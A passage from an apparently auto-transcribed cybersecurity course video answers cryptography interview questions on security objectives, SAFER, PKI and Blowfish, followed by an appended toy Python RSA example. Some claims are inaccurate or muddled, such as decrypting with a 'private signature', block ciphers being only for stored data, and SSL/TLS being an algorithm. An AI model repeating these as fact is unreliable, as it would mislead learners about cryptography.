to that account if both of these match only then do we get access to that account and we are able to make uh whatever transactions we want to make now when we are making those transactions non-repidation comes into the place where all our activities also being logged so we have identified our account we have authenticated ourselves by providing the password so the proof is there that it is us who are trying to access it and then whatever activity we do send an email receive an email delete something attach something all of those activities are logged and stored as proof of what actions have been done so tomorrow if we deny having sent an email gmail can still prove to us through those logs that though that that activity was done by us and the fourth part is integrity which ensures that the data received and sent and sent by the sender and received by the recipient has not been modified while in motion so the Integrity part is the trustworthiness of that data that the data has not been modified by any hacker or any other entity and is still trustworthy so these are the four Prime objectives of modern cryptography once I have scrambled that data using my Public's signature it is only my private signature that is going to decrypt it right using these mechanisms I will be able to achieve all these four aspects of cryptography and security next question what is safer now c4 stands for secure and fast encryption routine which is also a block Cipher as we have discussed previously block Cipher is a cipher that is used to encrypt data that is stored so it has a 64-bit block size and byte oriented algorithm uh safer's encryption and decryption procedures are highly secure this technology is widely used in applications like digital payment cards so when you are using uh a digital payment gateway to make transactions so you have we have gone on to an online portal you want to purchase a particular item and then it takes you to another payment Gateway where you have to fill in 
your credit card information sensitive information like your uh expiry dates CVV information and then the OTP or the password that you have created for your particular account now all of these need to be secured or highly secured based on PCI DSS which is the payment card industry data security standard so these standards ensure that certain Protocols are utilized to attain that level of security safer is one of those block ciphers that is used under the digital payment Gateway infrastructure next question how does the public infrastructure public key infrastructure work now we have already discussed this in the previous diagrams uh we have identified the key players the certification Authority the registration Authority the end user who requires the digital certificate the validation Authority who's going to validate it and then the recipe and the end user with whom the transaction is going to be uh conducted so the first point here is the request for the digital certificate is sent to the registration Authority they validate it and then they okay to the certification Authority who then process the request and the digital certificate is issued to the person who has requested it so when the person wants to conduct that transaction they use that uh digital certificate to sign that transaction with the end user the end user validates that with the validation Authority and once validated the transaction goes through and now the last question what is the Blowfish algorithm it is a 64-bit symmetric encryption algorithm so this is an algorithm that uses the same key to encrypt and the same key to decrypt the same secret Keys used to encrypt and decorate the messages here the operations are based on exclusive ores and additions to on 32-bit words the key has a maximum length of 448 bits now this is a little bit technical uh you might not want to go this technical in a in an interview question you just need to identify what the algorithm is used for so whether it is a 
symmetric algorithm which means it uses the same key or a symmetric algorithm where it uses a public key to encrypt and a private key to decrypt or does the Blowfish algorithm is just one more algorithm which uses symmetric encryption to encrypt and decrypt data algorithms that we have seen are essay and others that we have discussed as well as the interview questions are concerned what we need to remember is which algorithms are symmetric which algorithms are asymmetric what do symmetric algorithms do and what do unsymmetric uh symmetric algorithms do and we also look at block ciphers and stream ciphers block size methods are utilized to encrypt data that is stored stationary data retype rest and stream ciphers are utilized for data in motion while they are being streamed so SSL and TLS is another algorithm that comes into the picture when you're looking at streaming data so that wraps up our full course on cyber security for 2023. we hope you had a lot to learn and will be on the lookout for any suggestions or doubts in the comments section below so if you have any queries you know what to do thank you so much for tuning in today and happy learning [Music] hi there if you like this video subscribe to the simply learned YouTube channel and click here to watch similar videos turn it up and get certified click here
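As an added illustration (not part of the transcript above), the following pure-Python textbook RSA ties together the RSA, PKI and "prime objectives" answers: encrypting with the public key and decrypting with the private key (confidentiality), and signing a SHA-256 digest with the private key so that anyone holding the public key can verify it (non-repudiation) and detect modification (integrity). The function names, the toy primes and the "pay 100 to bob" message are all constructed for this example; real deployments use 2048-bit keys, OAEP/PSS padding and a vetted library.

```python
# Added example, not from the transcript: textbook RSA to show the public/private
# key split and the confidentiality / non-repudiation / integrity objectives.
# Primes are constructed toy values (far too small for real use); requires
# Python 3.8+ for pow(e, -1, phi).
import hashlib
from math import gcd

def rsa_keygen(p: int, q: int, e: int = 65537):
    """Return ((n, e), (n, d)) for the given (constructed) primes p and q."""
    n = p * q
    phi = (p - 1) * (q - 1)
    assert gcd(e, phi) == 1, "e must be coprime to phi(n)"
    d = pow(e, -1, phi)                  # private exponent = modular inverse of e
    return (n, e), (n, d)

def rsa_encrypt(pub, m: int) -> int:
    n, e = pub
    assert 0 <= m < n, "message must be smaller than the modulus"
    return pow(m, e, n)                  # anyone with the public key can encrypt

def rsa_decrypt(priv, c: int) -> int:
    n, d = priv
    return pow(c, d, n)                  # only the private key holder can decrypt

def _digest(msg: bytes, n: int) -> int:
    # Hash-then-sign: the signer signs the SHA-256 digest, never the raw data.
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % n

def rsa_sign(priv, msg: bytes) -> int:
    n, d = priv
    return pow(_digest(msg, n), d, n)    # signing uses the private key

def rsa_verify(pub, msg: bytes, sig: int) -> bool:
    n, e = pub
    return pow(sig, e, n) == _digest(msg, n)   # verification uses the public key

# Constructed demo primes: largest prime below 10**6 and smallest prime above it.
PUB, PRIV = rsa_keygen(999983, 1000003)

def demo() -> dict:
    secret = 424242                      # constructed plaintext (an integer < n)
    c = rsa_encrypt(PUB, secret)
    msg = b"pay 100 to bob"              # constructed transaction to be signed
    sig = rsa_sign(PRIV, msg)
    return {
        "roundtrip": rsa_decrypt(PRIV, c) == secret,            # confidentiality
        "valid": rsa_verify(PUB, msg, sig),                      # non-repudiation
        "tampered": rsa_verify(PUB, b"pay 999 to bob", sig),     # integrity: False
    }

if __name__ == "__main__":
    print(demo())
```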